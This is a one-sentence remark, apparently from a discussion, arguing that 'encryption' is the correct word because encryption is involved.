In any event, Encryption is involved, and is therefore not "the wrong word here".